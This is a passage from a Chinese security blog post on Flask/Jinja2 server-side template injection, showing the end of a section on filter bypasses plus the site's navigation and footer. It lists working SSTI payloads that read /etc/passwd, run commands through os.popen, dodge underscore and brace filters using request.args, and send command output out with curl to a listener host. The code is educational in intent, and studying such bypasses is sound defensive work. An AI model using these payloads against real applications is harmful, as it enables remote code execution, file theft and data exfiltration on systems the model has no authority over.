<li>利用requests.args<br>request.args 是flask中的一个属性，为返回请求的参数，这里把path当作变量名，将后面的路径传值进来，进而绕过了引号的过滤。<br>将其中的request.args改为request.values则利用post的方式进行传参<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">().__class__.__bases__[0].__subclasses__()[40](request.args.path).read()&#125;&#125;&amp;path=/etc/passwd</span><br><span class="line"></span><br><span class="line">执行命令</span><br><span class="line">&#123;&#123;().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen(request.args.cmd).read()&#125;&#125;&amp;cmd=whoami</span><br></pre></td></tr></table></figure></li>
</ul>
<ol start="4">
<li>过滤双下划线<br>利用 request.args 的属性</li>
</ol>
<p><code>&#123;&#123; ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() &#125;&#125;&amp;class=__class__&amp;mro=__mro__&amp;subclasses=__subclasses__ </code></p>
<ol start="5">
<li>过滤双大括号<code>&#123;&#123;</code><br>dns外带+if条件句<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% if ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen(&#x27;curl http://127.0.0.1:4444/?i=`whoami`&#x27;).read()==&#x27;p&#x27; %&#125;1&#123;% endif</span><br></pre></td></tr></table></figure></li>
</ol>
<p>tip:具体问题具体分析,还是需要理解代码更深层的东西才好理解ssti</p>
<p>参考链接: <a target="_blank" rel="noopener" href="https://saucer-man.com/information_security/516.html#cl-10">https://saucer-man.com/information_security/516.html#cl-10</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ssti/" rel="tag"># ssti</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/12/09/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%9B%98/" rel="prev" title="西湖论剑题目复盘">
      <i class="fa fa-chevron-left"></i> 西湖论剑题目复盘
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="nav-number">1.</span> <span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A8%A1%E7%89%88%E5%BC%95%E6%93%8E"><span class="nav-number">2.</span> <span class="nav-text">模版引擎</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#python%E7%9A%84ssti"><span class="nav-number">3.</span> <span class="nav-text">python的ssti</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AF%BB%E5%8F%96%E9%85%8D%E7%BD%AE"><span class="nav-number">3.1.</span> <span class="nav-text">读取配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="nav-number">3.2.</span> <span class="nav-text">执行命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84payload"><span class="nav-number">3.3.</span> <span class="nav-text">常见的payload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87"><span class="nav-number">3.4.</span> <span class="nav-text">绕过</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="L-1-q"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">L-1-q</p>
  <div class="site-description" itemprop="description">勤奋和耐心是最朴实的道理,我们会在腐朽的日子里光芒万丈!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; Tue Dec 07 2021 08:00:00 GMT+0800 (中国标准时间) – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">L-1-q</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>
    <script defer src="/lib/three/three-waves.min.js"></script>


  















  

  

</body>
</html>
